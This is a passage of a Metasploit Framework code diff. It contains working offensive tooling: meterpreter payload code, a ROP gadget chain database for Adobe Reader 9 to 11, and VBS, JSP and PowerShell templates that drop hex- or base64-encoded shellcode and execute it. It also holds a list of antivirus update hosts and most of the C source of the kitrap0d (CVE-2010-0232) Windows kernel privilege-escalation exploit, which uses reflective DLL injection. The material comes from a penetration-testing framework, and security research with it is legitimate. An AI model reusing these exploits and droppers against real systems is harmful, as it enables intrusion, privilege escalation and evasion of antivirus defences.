$tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
$offset += $tlv['len'];
@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
}
function packet_get_all_tlvs($pkt, $type) {
my_print("Looking for all tlvs of type $type");
# Start at offset 8 to skip past the packet header
$offset = 8;
$all = array();
while ($offset < strlen($pkt)) {
$tlv = tlv_unpack(substr($pkt, $offset));
if ($tlv == NULL) {
break;
}
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
my_print("Found one at offset $offset");
array_push($all, $tlv);
}
$offset += $tlv['len'];
}
return $all;
}
##
# Functions for genericizing the stream/socket conundrum
##

7
data/meterpreter/meterpreter.py
View File

@ -158,15 +158,10 @@ class STDProcessBuffer(threading.Thread):
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
for byte in iter(lambda: self.std.read(1), ''):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
data = self.std.read()
self.data_lock.acquire()
self.data += data
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/msflinker_linux_x86.bin
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

132
data/ropdb/reader.xml Normal file
View File

@ -0,0 +1,132 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>9</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x2313d">pop ecx # ret</gadget>
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x0155a">pop edi # ret</gadget>
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x2d4de">pop ebx # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x44122">mov edx, ecx</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
<gadget offset="0x476ab">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>10</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x05016">pop edi # ret</gadget>
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x14241">pop ebx # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x4b49d">mov edx, ecx</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
<gadget offset="0x2a8df">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x55093">pop edi # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x60bc4">call eax # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
<gadget offset="0x463d0">pop ebx # ret</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
</gadgets>
</rop>
</db>

8
data/templates/scripts/to_exe.vbs.template
View File

@ -1,5 +1,5 @@
Function %{var_func}()
%{var_shellcode}
%{var_shellcode} = "%{hex_shellcode}"
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@ -10,9 +10,11 @@ Function %{var_func}()
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
%{var_stream}.Write %{var_bytes}
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")

10
data/templates/scripts/to_exe_jsp.war.template
View File

@ -39,11 +39,13 @@
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
}
else
}
else
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

2
data/templates/scripts/to_mem_dotnet.ps1.template
View File

@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
%{shellcode}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

BIN
data/vncdll.dll
View File

Binary file not shown.

BIN
data/vncdll.x64.dll
View File

Binary file not shown.

BIN
data/vncdll.x86.dll Executable file
View File

Binary file not shown.

28
data/wordlists/av-update-urls.txt Normal file
View File

@ -0,0 +1,28 @@
www.es-web.sophos.com
www.es-web.sophos.com.edgesuite.net
www.es-web-2.sophos.com
www.es-web-2.sophos.com.edgesuite.net
www.dnl-01.geo.kaspersky.com
www.downloads2.kaspersky-labs.com
www.liveupdate.symantecliveupdate.com
www.liveupdate.symantec.com
www.update.symantec.com
www.update.nai.com
www.download797.avast.com
www.guru.avg.com
www.osce8-p.activeupdate.trendmicro.com
www.forefrontdl.microsoft.com
es-web.sophos.com
es-web.sophos.com.edgesuite.net
es-web-2.sophos.com
es-web-2.sophos.com.edgesuite.net
dnl-01.geo.kaspersky.com
downloads2.kaspersky-labs.com
liveupdate.symantecliveupdate.com
liveupdate.symantec.com
update.symantec.com
update.nai.com
download797.avast.com
guru.avg.com
osce8-p.activeupdate.trendmicro.com
forefrontdl.microsoft.com

1
data/wordlists/http_owa_common.txt
View File

@ -1,5 +1,6 @@
aspnet_client/
Autodiscover/
exchange/
ecp/
EWS/
Microsoft-Server-ActiveSync/

3968
data/wordlists/malicious_urls.txt Normal file
View File

File diff suppressed because it is too large Load Diff

16
documentation/gendocs.sh
View File

@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
rake yard

1
external/source/ReflectiveDLLInjection vendored Submodule

@ -0,0 +1 @@
Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103

BIN
external/source/ReflectiveDllInjection_v1.0.zip vendored
View File

Binary file not shown.

89
external/source/exploits/CVE-2010-0232/common/ResourceLoader.c vendored Normal file
View File

@ -0,0 +1,89 @@
/*!
* @file ResourceLoader.c
* @brief Helper functions for loading embedded resources.
*/
#include <Windows.h>
#include "common.h"
/*!
* @brief Load a resource from the given module as a raw array of bytes.
* @param hModule Handle to the module containing the resource.
* @param uResourceId ID of the resource to load.
* @param lpType The type of resource being loaded.
* @param pBuffer Pointer to the buffer that will receive the loaded resource.
* @param pBufferSize Pointer to the variable that will receive the size of \c pBuffer.
* @returns Indication of success or failure.
*/
DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize)
{
DWORD dwResult = FALSE;
DWORD dwResourceSize = 0;
LPBYTE pResource = NULL;
HRSRC hResource = NULL;
HGLOBAL hResData = NULL;
LPVOID lpResData = NULL;
*pBuffer = NULL;
*pBufferSize = 0;
do
{
if ((hResource = FindResourceA(hModule, MAKEINTRESOURCEA(uResourceId), lpType)) == NULL) {
dwResult = GetLastError();
dprintf("[RES] Unable to find resource %d type %s", uResourceId, lpType);
break;
}
if ((dwResourceSize = SizeofResource(hModule, hResource)) == 0) {
dwResult = GetLastError();
dprintf("[RES] Unable to find resource size for %d type %s", uResourceId, lpType);
break;
}
if ((pResource = (LPBYTE)malloc(dwResourceSize)) == NULL) {
dwResult = ERROR_NOT_ENOUGH_MEMORY;
dprintf("[RES] Unable to allocate memory for resource %d type %s size %u", uResourceId, lpType, dwResourceSize);
break;
}
if ((hResData = LoadResource(hModule, hResource)) == NULL) {
dwResult = GetLastError();
dprintf("[RES] Unable to load resource for %d type %s", uResourceId, lpType);
break;
}
if ((lpResData = LockResource(hResData)) == NULL) {
dwResult = GetLastError();
dprintf("[RES] Unable to lock resource for %d type %s", uResourceId, lpType);
break;
}
memcpy_s(pResource, dwResourceSize, lpResData, dwResourceSize);
// Locked resource don't need to be unlocked. If we get here, we've won!
dwResult = ERROR_SUCCESS;
*pBuffer = lpResData;
*pBufferSize = dwResourceSize;
} while (0);
if (dwResult != ERROR_SUCCESS && pResource != NULL) {
free(pResource);
}
return dwResult;
}
/*!
* @brief Free up memory that was allocated when loading the resource.
* @param lpBuffer Pointer to the allocated buffer.
* @returns \c ERROR_SUCCESS
*/
DWORD resource_destroy(LPBYTE lpBuffer)
{
if (lpBuffer != NULL)
{
free(lpBuffer);
}
return ERROR_SUCCESS;
}

11
external/source/exploits/CVE-2010-0232/common/ResourceLoader.h vendored Normal file
View File

@ -0,0 +1,11 @@
/*!
* @file ResourceLoader.h
* @brief Declarations of helper functions for loading embedded resources.
*/
#ifndef _ESCALATE_RESOURCELOADER_H
#define _ESCALATE_RESOURCELOADER_H
DWORD resource_extract_raw(HMODULE hModule, UINT uResourceId, LPCSTR lpType, LPBYTE* pBuffer, LPDWORD pBufferSize);
DWORD resource_destroy(LPBYTE lpBuffer);
#endif

46
external/source/exploits/CVE-2010-0232/common/common.h vendored Normal file
View File

@ -0,0 +1,46 @@
#ifndef _ESCALATE_COMMON_H
#define _ESCALATE_COMMON_H
/*! @brief When defined, debug output is enabled on Windows builds. */
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#include <stdio.h>
#include <stdarg.h>
#include <string.h>
#define dprintf(...) real_dprintf(__VA_ARGS__)
#else
#define dprintf(...) do{}while(0);
#endif
/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
#define BREAK_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
/*! @brief Sets `dwResult` to `error`, prints debug output, then `break;` */
#define BREAK_WITH_ERROR( str, err ) { dwResult = err; dprintf( "%s. error=%d", str, dwResult ); break; }
/*! @brief Sets `dwResult` to the return value of `WASGetLastError()`, prints debug output, then does `break;` */
#define BREAK_ON_WSAERROR( str ) { dwResult = WSAGetLastError(); dprintf( "%s. error=%d", str, dwResult ); break; }
/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `continue;` */
#define CONTINUE_ON_ERROR( str ) { dwResult = GetLastError(); dprintf( "%s. error=%d", str, dwResult ); continue; }
/*! @brief Close a service handle if not already closed and set the handle to NULL. */
#define CLOSE_SERVICE_HANDLE( h ) if( h ) { CloseServiceHandle( h ); h = NULL; }
/*! @brief Close a handle if not already closed and set the handle to NULL. */
#define CLOSE_HANDLE( h ) if( h ) { DWORD dwHandleFlags; if(GetHandleInformation( h , &dwHandleFlags)) CloseHandle( h ); h = NULL; }
#ifdef DEBUGTRACE
/*!
* @brief Output a debug string to the debug console.
* @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed
* using Visual Studio's _Output_ window, _DebugView_ from _SysInternals_, or _Windbg_.
*/
static void real_dprintf(char *format, ...) {
va_list args;
char buffer[1024];
va_start(args,format);
vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer);
}
#endif
#endif

31
external/source/exploits/CVE-2010-0232/kitrap0d.sln vendored Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d", "kitrap0d\kitrap0d.vcxproj", "{6B678096-E18A-427A-A8A3-C268AD2E12B8}"
ProjectSection(ProjectDependencies) = postProject
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D} = {DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}
EndProjectSection
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "kitrap0d_payload", "kitrap0d_payload\kitrap0d_payload.vcxproj", "{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.ActiveCfg = Debug|Win32
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Debug|Win32.Build.0 = Debug|Win32
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.ActiveCfg = Release|Win32
{6B678096-E18A-427A-A8A3-C268AD2E12B8}.Release|Win32.Build.0 = Release|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.ActiveCfg = Debug|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Debug|Win32.Build.0 = Debug|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.ActiveCfg = Release|Win32
{DA8EF396-6CC2-404C-AA6A-AD18ACCB2E2D}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

497
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c vendored Executable file
View File

@ -0,0 +1,497 @@
/*!
* @file kitrap0d.c
* @brief A port of HDM's/Pusscat's implementation of Tavis Ormandy's code (vdmallowed.c).
* @remark See http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
* @remark Known Bugs:
* - Windows NT4 fails to map the NULL page, (exit code 'NTAV').
* - Windows 2000 fails to find the VDM_TIB size (something else is wrong)
* - Windows 2008 Storage Server has 16-bit applications disabled by default
* - Windows 2008 Storage Server is also missing twunk_16.exe, has debug.exe
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include <stdio.h>
#include "../common/common.h"
#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include "../common/ResourceLoader.h"
#include "resource.h"
#define PAGE_SIZE 0x1000
enum { SystemModuleInformation = 11 };
typedef struct
{
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct CodeSignature
{
UCHAR Signature[16];
DWORD Version;
};
/*!
* @brief List of code signatures used when searching kernel memory.
* @remark These are generated using kd -kl -c 'db nt!Ki386BiosCallReturnAddress;q'
*/
struct CodeSignature CodeSignatures[] = {
{ "\x64\xA1\x1C\x00\x00\x00\x5A\x89\x50\x04\x8B\x88\x24\x01\x00\x00", 0 }, // Windows NT4
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 1 }, // Windows 2000
{ "\x64\xA1\x1C\x00\x00\x00\x5F\x8B\x70\x04\xB9\x84\x00\x00\x00\x89", 1 }, // Windows 2000 SP4 Advanced Server
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 2 }, // Windows XP
{ "\xA1\x1C\xF0\xDF\xFF\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00\x00", 3 }, // Windows 2003
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 3 }, // Windows .NET
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 4 }, // Windows Vista
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 5 }, // Windows 2008
{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 6 }, // Windows 7
{ "", -1 }
};
/*!
* @brief Scan the appropriate kernel image for the correct offset.
* @retval TRUE An offset was found.
* @retval FALSE An offset was not found.
*/
BOOL kitrap0d_scan_kernel(PDWORD KernelBase, PDWORD OffsetFromBase)
{
DWORD dwResult = ERROR_SUCCESS;
FARPROC NtQuerySystemInformation = NULL;
HMODULE hKernel = NULL;
HMODULE hNtdll = NULL;
PIMAGE_DOS_HEADER DosHeader = NULL;
PIMAGE_NT_HEADERS PeHeader = NULL;
PIMAGE_OPTIONAL_HEADER OptHeader = NULL;
PBYTE ImageBase = NULL;
HKEY MmHandle = NULL;
OSVERSIONINFO os = { 0 };
SYSTEM_MODULE_INFORMATION ModuleInfo = { 0 };
DWORD PhysicalAddressExtensions = 0;
DWORD DataSize = 0;
ULONG i = 0;
ULONG x = 0;
// List of versions we have code signatures for.
enum {
MICROSOFT_WINDOWS_NT4 = 0,
MICROSOFT_WINDOWS_2000 = 1,
MICROSOFT_WINDOWS_XP = 2,
MICROSOFT_WINDOWS_2003 = 3,
MICROSOFT_WINDOWS_VISTA = 4,
MICROSOFT_WINDOWS_2008 = 5,
MICROSOFT_WINDOWS_7 = 6,
} Version = MICROSOFT_WINDOWS_7;
do
{
hNtdll = GetModuleHandle("ntdll");
if (!hNtdll) {
BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetModuleHandle ntdll failed", ERROR_INVALID_HANDLE);
}
// NtQuerySystemInformation can be used to find kernel base address
NtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
BREAK_WITH_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetProcAddress NtQuerySystemInformation failed", ERROR_INVALID_HANDLE);
}
// Determine kernel version so that the correct code signature is used
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if (!GetVersionEx(&os)) {
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx failed");
}
dprintf("[KITRAP0D] kitrap0d_scan_kernel. GetVersionEx() => %u.%u", os.dwMajorVersion, os.dwMinorVersion);
if (os.dwMajorVersion == 4 && os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_NT4;
}
if (os.dwMajorVersion == 5) {
if (os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_2000;
}
if (os.dwMinorVersion == 1) {
Version = MICROSOFT_WINDOWS_XP;
}
if (os.dwMinorVersion == 2) {
Version = MICROSOFT_WINDOWS_2003;
}
}
if (os.dwMajorVersion == 6) {
if (os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_VISTA;
}
if (os.dwMinorVersion == 0) {
Version = MICROSOFT_WINDOWS_2008;
}
if (os.dwMinorVersion == 1) {
Version = MICROSOFT_WINDOWS_7;
}
}
// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address
NtQuerySystemInformation(SystemModuleInformation, &ModuleInfo, sizeof(ModuleInfo), NULL);
dprintf("[KITRAP0D] kitrap0d_scan_kernel. NtQuerySystemInformation() => %s@%p", ModuleInfo.Module[0].ImageName, ModuleInfo.Module[0].Base);
// Load the kernel image specified
hKernel = LoadLibrary(strrchr(ModuleInfo.Module[0].ImageName, '\\') + 1);
if (!hKernel) {
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_scan_kernel. LoadLibrary failed");
}
// Parse image headers
*KernelBase = (DWORD)ModuleInfo.Module[0].Base;
ImageBase = (PBYTE)hKernel;
DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
PeHeader = (PIMAGE_NT_HEADERS)(ImageBase + DosHeader->e_lfanew);
OptHeader = &PeHeader->OptionalHeader;
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Searching for kernel %u.%u signature: version %d...", os.dwMajorVersion, os.dwMinorVersion, Version);
for (x = 0;; x++)
{
if (CodeSignatures[x].Version == -1) {
break;
}
if (CodeSignatures[x].Version != Version) {
continue;
}
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Trying signature with index %d", x);
// Scan for the appropriate signature...
for (i = OptHeader->BaseOfCode; i < OptHeader->SizeOfCode; i++)
{
if (memcmp(&ImageBase[i], CodeSignatures[x].Signature, sizeof CodeSignatures[x].Signature) == 0)
{
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Signature found %#x bytes from kernel base", i);
*OffsetFromBase = i;
FreeLibrary(hKernel);
return TRUE;
}
}
}
} while (0);
dprintf("[KITRAP0D] kitrap0d_scan_kernel. Code not found, the signatures need to be updated for this kernel");
if (hKernel) {
FreeLibrary(hKernel);
}
return FALSE;
}
/*!
* @brief Grab a useful Handle to NTVDM.
* @param cpProgram Path to the program to invoke.
* @param hProcess Pointer to the variable that will receive the process handle.
* @retval TRUE Handle acquisition succeeded.
* @retval TRUE Handle acquisition failed.
*/
BOOL kitrap0d_spawn_ntvdm(char * cpProgram, HANDLE * hProcess)
{
DWORD dwResult = ERROR_SUCCESS;
PROCESS_INFORMATION pi = { 0 };
STARTUPINFO si = { 0 };
ULONG i = 0;
do
{
si.cb = sizeof(STARTUPINFO);
// Start the child process, which should invoke NTVDM...
if (!CreateProcess(cpProgram, cpProgram, NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess failed");
}
dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. CreateProcess(\"%s\") => %u", cpProgram, pi.dwProcessId);
// Get more access
*hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_TERMINATE, FALSE, pi.dwProcessId);
if (*hProcess == NULL)
{
TerminateProcess(pi.hProcess, 'SPWN');
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
BREAK_ON_ERROR("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess failed");
}
dprintf("[KITRAP0D] kitrap0d_spawn_ntvdm. OpenProcess(%u) => %#x", pi.dwProcessId, *hProcess);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
} while (0);
if (dwResult == ERROR_SUCCESS) {
return TRUE;
}
return FALSE;
}
/*!
* @brief Find a suitable exe to host the exploit in.
* @param cpOutput Buffer that will contain the path to the executable which will
* host the exploit.
* @param dwOutputSize Size of the \c cpOutput buffer.
* @retval TRUE Found a valid exe to host the exploit in.
* @retval FALSE Unable to find a valid exe to host the exploit in.
*/
BOOL elevate_via_exploit_getpath( char *cpOutput, DWORD dwOutputSize )
{
DWORD dwResult = ERROR_SUCCESS;
char cWinDir[MAX_PATH] = {0};
DWORD dwIndex = 0;
char * cpFiles[] = { "twunk_16.exe",
"debug.exe",
"system32\\debug.exe",
NULL };
do
{
if( !GetWindowsDirectory( cWinDir, MAX_PATH ) )
BREAK_ON_ERROR( "[KITRAP0D] elevate_via_exploit_getpath. GetWindowsDirectory failed" );
while( TRUE )
{
char * cpFileName = cpFiles[dwIndex];
if( !cpFileName )
break;
if ( _snprintf_s( cpOutput, dwOutputSize, dwOutputSize - 1, "%s%s%s", cWinDir,
cWinDir[ strlen(cWinDir) - 1 ] == '\\' ? "" : "\\", cpFileName ) == -1 )
{
